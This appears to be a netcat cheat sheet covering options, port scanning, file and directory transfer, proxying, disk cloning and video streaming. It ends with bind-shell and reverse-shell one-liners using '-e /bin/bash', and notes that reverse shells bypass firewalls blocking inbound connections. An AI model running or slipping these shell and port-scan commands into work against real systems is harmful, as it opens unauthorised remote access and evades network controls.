Skip to content
halo`s Docs

Netcat

Getting Started {.cols-5}

Usage {.col-span-2}

Connect to a host located anywhere

Terminal window
$ nc [options] [host] [port]

Listen for incoming connections

Terminal window
$ nc -lp port [host] [port]

Option examples {.col-span-3 .row-span-2}

OptionDescriptionExample
-hnc -hHelp
-znc -z 192.168.1.9 1-100Port scan for a host or IP address
-vnc -zv 192.168.1.9 1-100Provide verbose output
-nnc -zn 192.168.1.9 1-100Fast scan by disabling DNS resolution
-lnc -lp 8000TCP Listen mode (for inbound connects)
-wnc -w 180 192.168.1.9 8000Define timeout value
-knc -kl 8000Continue listening after disconnection
-unc -u 192.168.1.9 8000Use UDP instead of TCP
-qnc -q 1 192.168.1.9 8000Client stay up after EOF
-4nc -4 -l 8000IPv4 only
-6nc -6 -l 8000IPv6 only

Chat client-server {.col-span-2}

Server (192.168.1.9)

Terminal window
$ nc -lv 8000

Client

Terminal window
$ nc 192.168.1.9 8000

Netcat Examples

Terminal window
$ nc website.com 80
GET index.html HTTP/1.1
HEAD / HTTP/1.1

or

Terminal window
echo "" | nc -zv -wl 192.168.1.1 801-805

Port scanning

Scan ports between 21 to 25

Terminal window
$ nc -zvn 192.168.1.1 21-25

Scan ports 22, 3306 and 8080

Terminal window
$ nc -zvn 192.168.1.1 22 3306 8080

Proxy and port forwarding

Terminal window
$ nc -lp 8001 -c "nc 127.0.0.1 8000"

or

Terminal window
$ nc -l 8001 | nc 127.0.0.1 8000

Create a tunnel from one local port to another

Download file

Server (192.168.1.9)

Terminal window
$ nc -lv 8000 < file.txt

Client

Terminal window
$ nc -nv 192.168.1.9 8000 > file.txt

Suppose you want to transfer a file “file.txt” from server A to client B.

Upload file

Server (192.168.1.9)

Terminal window
$ nc -lv 8000 > file.txt

Client

Terminal window
$ nc 192.168.1.9 8000 < file.txt

Suppose you want to transfer a file “file.txt” from client B to server A:

Directory transfer

Server (192.168.1.9)

Terminal window
$ tar -cvf  dir_name | nc -l 8000

Client

Terminal window
$ nc -n 192.168.1.9 8000 | tar -xvf -

Suppose you want to transfer a directory over the network from A to B.

Encrypt transfer {.col-span-2}

Server (192.168.1.9)

Terminal window
$ openssl enc -des3 -in file.txt -pass pass:password | nc -l 8000

Client

Terminal window
$ nc 192.168.1.9 8000 | openssl enc -des3 -d -pass pass:password -out file.txt

Encrypt data before transfering over the network

Clones

Server (192.168.1.9)

Terminal window
$ dd if=/dev/sda | nc -l 8000

Client

Terminal window
$ nc -n 192.168.1.9 8000 | dd of=/dev/sda

Cloning a linux PC is very simple. Suppose your system disk is /dev/sda

Video streaming

Server (192.168.1.9)

Terminal window
$ cat video.avi | nc -l 8000

Client

Terminal window
$ nc 192.168.1.9 8000 | mplayer -vo x11 -cache 3000 -

Streaming video with netcat

Remote shell

Server (192.168.1.9)

Terminal window
$ nc -lv 8000 -e /bin/bash

Client

Terminal window
$ nc 192.168.1.9 8000

We have used remote Shell using the telnet and ssh but what if they are not installed and we do not have the permission to install them, then we can create remote shell using netcat also.

Reverse shell

Server (192.168.1.9)

Terminal window
$ nc -lv 8000

Client

Terminal window
$ nc 192.168.1.9 8000 -v -e /bin/bash

Reverse shells are often used to bypass the firewall restrictions like blocked inbound connections